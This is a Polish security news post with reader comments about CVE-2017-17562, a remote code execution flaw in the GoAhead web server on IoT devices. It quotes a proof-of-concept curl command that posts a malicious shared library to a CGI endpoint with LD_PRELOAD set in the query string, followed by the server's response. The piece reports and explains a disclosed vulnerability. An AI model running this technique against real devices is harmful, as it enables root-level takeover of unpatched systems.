-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

Zagłada IoT – jednen z najpopularniejszych serwerów HTTP w IoT podatny na zdalne, proste wykonanie kodu

18 grudnia 2017, 17:53 | W biegu | komentarzy 7

Podatność  CVE-2017-17562 występuje w web serwerze GoAhead, wykorzystywanym przez przeszło 700 000 urządzeń dostępnych w Internecie (wg. cytowanego w oryginalnym wpisie Shodana; Zoomeye potrafi wskazać nawet ~2 000 000 urządzeń).

Podatne są wszystkie wersje serwera GoAhead < 3.6.5  – a umożliwiają one zdalne wykonanie kodu – na urządzeniach klasy IoT będzie to najczęściej root. Często nie będzie to wymagało żadnego uwierzytelnienia…

Dostępny jest też gotowy exploit,  z wariantami na ARM/MIPS/oraz architekturę Intela (32 oraz 64 bity), który technicznie sprowadza się do załadowania swojej biblioteki (ze złośliwym wykorzystaniem LD_PRELOAD) do binarki webserwera:

daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9931    0  2035  100  7896   2035   7896  0:00:01  0:00:01 --:--:--  9774
HTTP/1.1 200 OK
Date: Sun Dec 17 13:08:20 2017
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello:  World!
Content-type: text/html

Ostatnia głośna akcja związana ze zmienną LD_PRELOAD, o której pamiętam dotyczyła privilege escalation we FreeBSD (można było wtedy załadować dowolną, własną bibliotekę do dowolnej suidowanej binarki).

Warto zwrócić uwagę, że zapewne większość urządzeń używających serwera GoAhead nigdy nie doczeka się patcha.

 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Pi7er

    …a ostrzegali o tym na DefConie w tym roku… To wiekszosc sie smiala i wychodzila w polowie talka….

    Odpowiedz
  2. Andrzej

    Gdzie wy widzicie 700k urządzeń na shodanie? Ja tam widzę ledwo 150k :(

    Odpowiedz
  3. Pawel

    Z tego co wstepnie doczytalem, to problem dotyczy jedynie CGI. Nie wszyscy uzywaja CGI wiec chyba generalizujecie za bardzo…

    Odpowiedz
    • Generalnie to tak, ale akurat CGI jest w IoT mocno popularne…

      Odpowiedz

Odpowiedz na Pawel